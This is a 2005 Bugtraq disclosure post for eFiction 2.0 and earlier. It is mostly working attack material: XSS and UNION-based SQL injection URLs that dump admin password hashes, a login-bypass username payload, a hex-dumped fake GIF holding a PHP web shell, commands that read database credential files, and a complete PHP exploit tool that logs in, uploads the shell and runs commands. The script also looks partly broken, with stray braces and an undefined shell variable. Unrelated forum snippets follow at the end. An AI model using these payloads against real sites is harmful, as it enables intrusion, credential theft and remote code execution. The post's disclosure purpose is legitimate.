eFiction <= 2.0 multiple vulnerabilities

retrogod_at_aliceposta.it
Date: 11/25/05

Next message: newbug_at_securityfocus.com,: "Mandriva Security"

Previous message: SEC Consult Research: "SEC Consult SA-20051125-0 :: More Vulnerabilities in vTiger CRM"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 25 Nov 2005 11:22:11 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is) efiction <= 2.0 remote code execution / SQL injection / login bypass / cross site scripting / path & information disclosure

software:
site: http://www.efiction.wallflowergirl.com/index.php
description: "Efiction is a software program that enables users to run automated original or fanfiction
archives on their websites. The program is PHP and MySQL database driven and is released as open-source software."

i)
xss:
efiction 1.0/1.1:
http://[target]/efiction/titles.php?action=viewlist&let=<script>alert(document.cookie)</script>
on version 2.0, thorugh sql injection:
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)</script>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

ii)
if magic_quotes_gpc off -> SQL INJECTION:
you can see at screen any admin/user MD5 password hash

efiction 1.0:
http://[target]/[path]/authors.php?action=viewlist&let='%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/*
http://[target]/[path]/authors.php?action=viewlist&let=%27%20UNION%20SELECT%20password,password%20FROM%20efiction_fanfiction_authors/*&offset=0,40/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*

efiction 1.1:
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20password,0,0,0,0,0,penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20penname,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%20penname,penname,password,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname%20FROM%20fanfiction_authors%20/*

efiction 2.0
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

iii)
if magic_quotes_gpc off -> Login bypass:
you can login as admin typing:

efiction 1.0:
username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email FROM fanfiction_authors where level=1/*
password: [nothing]

efiction 1.1:
username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories FROM fanfiction_authors where level=1/*
password: [nothing]

efiction 2.0:
username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories,ageconsent FROM fanfiction_authors where level=1/*
password: [nothing] ^
                                      |
                                      |
                                 this is the hash of [nothing]

iv)

remote code execution (1.0/1.1/2.0):

register, a temporary password will be sent to you by email, login, goto "Manage Images"
(or go to http://target/path/user.php?action=manageimages&upload=upload), choose "Upload new image", upload a fake gif cmd.php
like this (this is the hexadecimal dump):

00000000:47 49 46 38 39 61 01 00 01 00 f7 00 00 a4 b6 a4 GIF89a....÷..¤¶¤
00000010:16 00 00 f4 00 00 77 00 00 6b 00 4c 15 00 00 f4 ...ô..w..k.L...ô
00000020:00 69 77 00 00 f8 00 6e 62 00 00 15 00 67 00 00 .iw..ّ.nb....g..
00000030:00 34 00 75 00 00 00 00 00 61 c0 00 00 00 00 00 .4.u.....aہ.....
00000040:00 00 00 00 00 00 00 00 00 89 00 00 1c 00 00 00 .........‰......
00000050:00 00 00 00 00 a9 00 00 20 00 00 00 00 00 00 00 .....©.. .......
00000060:00 6f 00 00 00 00 00 00 00 00 00 00 00 56 00 00 .o...........V..
00000070:00 00 00 3c 3f 70 68 70 20 65 72 72 6f 72 5f 72 ...<?php error_r
00000080:65 70 6f 72 74 69 6e 67 28 30 29 3b 69 6e 69 5f eporting(0);ini_
00000090:73 65 74 28 22 6d 61 78 5f 65 78 65 63 75 74 69 set("max_executi
000000a0:6f 6e 5f 74 69 6d 65 22 2c 30 29 3b 73 79 73 74 on_time",0);syst
000000b0:65 6d 28 24 5f 47 45 54 5b 63 6d 64 5d 29 3b 3f em($_GET[cmd]);?
000000c0:3e 38 00 00 e5 00 00 12 00 00 00 00 00 00 00 98 >8..ه..........ک
000000d0:01 00 cc 00 00 15 00 00 00 58 00 10 e6 00 04 12 ..ج......X..و...
000000e0:00 10 00 00 04 05 00 01 90 00 00 f6 00 00 77 00 ........گ..ِ..w.
000000f0:00 c8 00 10 d5 00 e8 f5 00 12 77 00 00 ff 00 13 .ب..ص.èُ..w..ے..
00000100:ff 00 6c ff 00 6c ff 00 74 6a 00 03 16 00 00 f4 ے.lے.lے.tj.....ô
00000110:00 00 77 00 00 c4 00 30 1e 00 75 e5 00 15 77 00 ..w..ؤ.0..uه..w.
00000120:00 00 00 00 00 00 00 15 00 00 00 00 00 00 00 dc ...............ـ
00000130:00 00 e7 00 00 12 00 00 00 70 00 01 59 00 00 18 ..ç......p..Y...
00000140:00 00 00 00 00 04 00 88 01 00 e8 05 00 12 01 00 .......ˆ..è.....
00000150:00 6c 00 04 e3 00 42 12 00 6e 00 00 74 7e 00 30 .l..م.B..n..t~.0
00000160:00 00 87 00 00 6e c0 00 74 00 00 ff 00 00 ff 00 ..‡..nہ.t..ے..ے.
00000170:00 ff 00 00 ff ff 00 d6 ff 00 32 ff 00 6e ff 00 .ے..ےے.ضے.2ے.nے.
00000180:74 ff 00 6c ff 00 5b ff 00 e5 ff 00 77 00 00 53 tے.lے.[ے.هے.w..S
00000190:00 00 15 00 00 53 00 00 00 00 00 00 00 00 00 00 .....S..........
000001a0:00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 00 ................
000001b0:00 6b 00 00 00 00 00 00 00 00 00 00 00 58 00 00 .k...........X..
000001c0:03 00 f0 00 00 15 00 00 00 06 00 00 f6 00 00 e4 ..ً.........ِ..ن
000001d0:00 00 77 00 00 0f 00 00 1e 00 00 e5 00 00 77 00 ..w........ه..w.
000001e0:00 00 00 00 01 00 00 00 00 00 00 00 00 f8 74 00 .............ّt.
000001f0:62 e7 00 01 12 00 00 00 00 00 c8 68 00 28 32 15 bç........بh.(2.
00000200:e5 e6 00 77 77 a4 00 ff e5 00 ff 12 00 ff 00 00 هو.ww¤.ےه.ے..ے..
00000210:ff 00 00 6c 00 00 5b 00 00 e5 00 00 77 fc f8 36 ے..l..[..ه..wüّ6
00000220:f7 62 00 12 15 00 00 00 00 05 00 36 90 01 00 f6 ÷b.........6گ..ِ
00000230:00 00 77 00 00 c8 04 d8 d5 29 ed f5 e5 12 77 77 ..w..ب.طص)يُه.ww
00000240:00 ff 94 ff ff e7 ff ff 12 ff ff 00 ff 6a 64 00 .ے”ےےçےے.ےے.ےjd.
00000250:16 2f 00 f4 e6 00 77 77 00 e0 00 9c 18 00 e8 e5 ./.ôو.ww.à.œ..èه
00000260:00 12 77 00 00 00 ff 4e 00 ff 21 15 ff 4c 00 ff ..w...ےN.ے!.ےL.ے
00000270:00 00 6f 7c 00 10 e8 00 e5 12 00 77 00 f8 00 7b ..o|..è.ه..w.ّ.{
00000280:62 00 e0 15 00 4e 00 00 00 00 98 b0 01 e8 e8 00 b.à..N....ک°.èè.
00000290:12 12 00 00 00 64 98 6f 2f 10 10 e6 e5 e5 77 77 .....dکo/..وههww
000002a0:77 00 10 52 00 e4 e9 00 4e 12 00 00 00 61 20 c8 w..R.نé.N....a ب
000002b0:00 02 ff 6c 4f ff 00 00 7f 69 00 1c 00 01 e9 61 ..ےlOے..i....éa
000002c0:00 12 00 00 00 29 94 00 00 e7 00 00 12 00 00 00 .....)”..ç......
000002d0:00 00 00 6f 00 01 10 00 00 e5 00 00 77 00 a0 00 ...o.....ه..w. .
000002e0:00 3a 00 00 50 00 00 00 00 00 00 01 00 30 00 00 .:..P........0..
000002f0:00 00 00 69 00 00 61 60 00 74 f1 00 74 15 00 69 ...i..a`.tٌ.t..i
00000300:00 00 00 f0 00 00 aa 00 02 47 00 00 00 21 f9 04 ...ً..ھ..G...!ù.
00000310:00 00 00 00 00 2c 00 00 00 00 01 00 01 00 07 08 .....,..........
00000320:04 00 01 04 04 00 3b ......;

you can craft a smaller gif, try it
the uploaded file is reachable at:

http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php
(efiction 1.0/1.1)

http://[target]/[path_to_efiction]/stories/[user_id]/images/cmd.php
ex:
http://[target]/[path_to_efiction]/stories/1/images/cmd.php
http://[target]/[path_to_efiction]/stories/2/images/cmd.php
(efiction 2.0)

now you can launch commands redirecting the output to a temporary file:

http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=ls%20-la>README
http://[target]/[path_to_efiction]/stories/[your_username]/images/README

to see database username & password:

http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=cat%20../../../data/dbconfig.php>README
http://[target]/[path_to_efiction]/stories/[your_username]/images/README

to see database table prefix and various settings:
http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=cat%20../../../config.php>README
http://[target]/[path_to_efiction]/stories/[your_username]/images/README

notes: in efiction 1.0 /1.1 members are NOT allowed to upload images by default
if efiction 2.0 members are allowed to upload images by default
from efiction 1.1, installing the script, you can specify a different table prefix, try efiction_fanfiction_authors, etc.

v) path disclosure:
http://[target]/efiction/storyblock.php

vi) information disclosure:

mphhh...
http://[target]/[path]/phpinfo.php

vii) you can always check for a install.php or upgrade.php to perform some actions on site/database

this is the exploit tool for iv) :

<?php
# ---efiction20_xpl.php 15.19 17/11/2005 #
# #
# eFiction <= 2.0 fake GIF Shell Upload #
# coded by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu: "If fighting is sure to result in victory, then you must fight, #
# even though the ruler forbid it; if fighting will not result in victory, #
# then you must not fight even at the ruler's bidding." #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html><head><title> ******** eFiction <= 2.0 remote commands xctn *********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
********* eFiction <= 2.0 remote commands xctn **********</p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'"> <p><input
type="text" name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/efiction/ or just / ) </span></p><p><input type="text" name="command"> <span
class="Stile5"> * specify a command , "cat ../../../data/dbconfig.php" to see
database user & password </span></p> <p><input type="text" name="username"><span
class="Stile5"> * username...</span> </p> <p> <input type="password"
name="password"><span class="Stile5">* ... and password to eFiction, required to
upload the fake gif </span> </p> <p> <input type="text" name="port">
<span class="Stile5">specify a port other than 80 ( default value )</span>
</p> <p> <input type="text" name="proxy"><span class="Stile5"> send exploit
through an HTTP proxy (ip:port)</span></p><p><input type="submit" name="Submit"
value="go!"></p></form> </td></tr></table></body></html>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>  </td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
                            }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

                                    }
                  }
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
      {$ock=fsockopen(gethostbyname($host),$port);
       if (!$ock) { echo 'No response from '.htmlentities($host);
                        die; }
      }
             else
           {
           $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                        die;
                       }
           $parts=explode(':',$proxy);
            echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
            $ock=fsockopen($parts[0],$parts[1]);
            if (!$ock) { echo 'No response from proxy...';
                        die;
                       }
           }
fputs($ock,$packet);
if ($proxy=='')
  {

    $html='';
    while (!feof($ock))
      {
        $html.=fgets($ock);
      }
  }
else
  {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
      $html.=fread($ock,1);
    }
  }
fclose($ock);
echo nl2br(htmlentities($html));
}

$host=$_POST[host];$path=$_POST[path];$username=$_POST[username];
$password=$_POST[password];$port=$_POST[port];$command=$_POST[command];
$proxy=$_POST[proxy];

if (($host<>'') and ($path<>'') and ($username<>'') and ($password<>'') and ($command<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);

#STEP 1 -> Login
$data='-----------------------------7d53102423092a
Content-Disposition: form-data; name="penname"

'.$username.'
-----------------------------7d53102423092a
Content-Disposition: form-data; name="password"

'.$password.'
-----------------------------7d53102423092a
Content-Disposition: form-data; name="submit"

Submit
-----------------------------7d53102423092a--';

$packet="POST ".$p."user.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.":".$port.$path."user.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d53102423092a\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host.$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(' ',$temp[1]);
$COOKIE=$temp2[0];
echo '<br>Your cookie: '.htmlentities($COOKIE);

$data='-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="upfile"; filename="C:\suntzu.php"
Content-Type: image/gif

'.$SHELL.'
-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="submit"

upload
-----------------------------7d529a1d23092a--
';

$packet="POST ".$p."user.php?action=manageimages&upload=upload HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.":".$port.$path."/user.php?action=manageimages&upload=upload\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$COOKIE."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);

#STEP 3 -> Launch commands...
$packet="GET ".$p."stories/".$username."/images/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("GIF89",$html)) {echo "Exploit succeeded..."; die;}
else {echo "Trying STEP 4...";}

#STEP 4 -> If Step 3 failed... maybe this is efiction 2.0, cycliing GET requests...
for ($i=1; $i<=100; $i++)
{
$packet="GET ".$p."stories/".$i."/images/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("GIF89",$html)) {echo "Exploit succeeded..."; die;}
}
//if you are here...
echo "Exploit failed...<br>";
}
else
{echo "Fill * required fields, optionally specify a proxy...";}
?>

rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
original advisory: http://rgod.altervista.org/efiction2_xpl.html

Next message: newbug_at_securityfocus.com,: "Mandriva Security"

Previous message: SEC Consult Research: "SEC Consult SA-20051125-0 :: More Vulnerabilities in vTiger CRM"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Problem handling Login control Authenticate event
... login process. ... required for login… they have a username, password, and another “location ... and when the extra input field is submitted ... for the users where this concatenation of the two input field ...
(microsoft.public.dotnet.framework.aspnet)
Re: Unable to log into OWA despite using correct username and pass
... the OWA interface despite using the correct username and password. ... OWA login page is displayed correctly but when trying to login users get ... "You could not be logged on to Outlook Web Access. ... The issue is affecting all accounts including the 'Administrator' ...
(microsoft.public.exchange.clients)
Re: ADSL connection username change (bt_test) - Side effects?
... automatically re-establish itself after a failure, ... does using the BT test login have any side effects. ... Has you tried re-entering the username and PW prior to trying ... My router recently locked me out of MAC code filtering settings and it was ...
(uk.telecom.broadband)
Re: failed password tries...!!
... but log only the username if the ... password/username pair is reversed but otherwise valid; and if a login ... The encryption code must be on the auth ... without first compromising your private key somehow. ...
(comp.lang.java.programmer)
Re: Problem with Upgrade MS Access 2003 to Access 2007
... requires a login (I assume you mean username) and password. ... When working with Workgroup Security the best advice is to realize ... I did go to the immediate window posting, and tried it out, doing the command ...
(microsoft.public.access.security)